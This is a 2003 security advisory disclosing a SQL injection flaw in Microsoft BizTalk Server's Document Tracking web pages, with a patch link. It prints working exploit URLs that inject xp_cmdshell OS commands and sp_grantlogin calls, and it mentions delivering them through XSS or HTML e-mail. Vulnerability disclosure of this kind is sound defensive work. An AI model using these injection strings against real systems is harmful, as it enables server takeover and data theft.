Security Advisory

Name:  Microsoft Biztalk Server Document Tracking and
Admnistration vulnerable to SQL injection
System Affected :  BizTalk Server 2000 and BizTalk
Server 2002
Severity :  High 
Remote exploitable : Yes
Author:    Cesar Cerrudo.
Date:    05/05/03
Advisory Number:    CC040302


Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may
NOT modify it and distribute it or distribute parts of
it without the author's written permission. You may
NOT use it for commercial intentions (this means
include it in vulnerabilities databases,
vulnerabilities scanners, any paid service, etc.)
without the author's written permission. You are free
to use Microsoft bulletin's details for commercial
intentions.


Disclaimer:

The information in this advisory is believed to be
true though it may be false.
The opinions expressed in this advisory are my own and
not of any company. The usual standard disclaimer
applies, especially the fact that Cesar Cerrudo is not
liable for any damages caused by direct or indirect
use of the information or functionality provided by
this advisory. Cesar Cerrudo bears no responsibility
for content or misuse of this advisory or any
derivatives thereof.


Overview:

Microsoft Biztalk Server is a Microsoft product for
business-process automation 
and application-integration both within and between
businesses. BizTalk Server  
provides a powerful Web-based development and
execution environment that integrates 
loosely coupled, long-running business processes, both
within and between companies. 
BizTalk Server features include integration among
existing applications; the definition
of document specifications and specification
transformations; and the monitoring and 
logging of run-time activity. The server provides a
standard gateway for sending and 
receiving documents across the Internet, as well as
providing a range of services that 
ensure data integrity, delivery, security, and support
for the BizTalk Framework and 
other key document formats.
Microsoft BizTalk Server provides the ability for
administrators to manage documents via 
a Document Tracking and Administration (DTA) web
interface. A SQL Injection vulnerability 
exists in some of the pages used by DTA that could
allow an attacker to send a crafted URL 
query string to a legitimate DTA user and to execute a
malicious embedded SQL statement in 
the query string.


Details:

BizTalk Document Tracking and Administration is a
stand-alone Web application that you can use to 
view interchanges and documents that you configured to
be tracked in Microsoft 
BizTalk Server. Biztalk Server uses SQL Server as a
backend database server.
Only members of Windows administrators or BizTalk
Server Report Users local groups 
are granted by default to use Biztalk Document
Tracking and Administration user interface and view 
tracked documents.
The web application authenticate users by Windows
authentication, the credentials are 
also used to authenticate to SQL Server. The web
application is located at:

http://server/biztalktracking/

There are two ASP pages on the web application that
connect from server side to SQL 
Server that are vulnerable to SQL injection:

http://server/biztalktracking/rawdocdata.asp

http://server/biztalktracking/RawCustomSearchField.asp


Exploits:

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.xp_cmdshell 'any OS command'--
 
or

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--

...etc.


There are others ASP and HTML pages in the Web
application that connect to SQL Server 
with activex components from client side that are also
vulnerable to SQL injection. 
But when a user access these pages a warning message
is displayed by Internet Explorer 
with default security settings for Intranet Zone:
"This page access data on another domain. Do you want
to allow this"
Making the explotation harder without alarming the
targeted administrators.

This vulnerability can be exploited throght XSS or
sending an administrator 
an HTML e-mail, etc. targeting the vulnerable server. 
Explotation of this vulnerability allows an attacker
to complete compromise 
SQL Server and could lead to further OS compromise.



Workaround:

Edit ASP and HTML source files to filter malicious
input.


Vendor Status :

Microsoft was contacted 02/14/03, we work together and
Microsoft released a fix.


Patch Available : 

http://www.microsoft.com/technet/security/bulletin/MS03-016.asp

 
NEW SECURITY LIST!!!: For people interested in SQL
Server security, vulnerabilities, SQL injection, etc.,
I'm starting a new mailing list.
People subscribed to the list received this advisory
five days ago!!.
Join at:

sqlserversecurity-subscribe@yahoogroups.com
http://groups.yahoo.com/group/sqlserversecurity/



__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com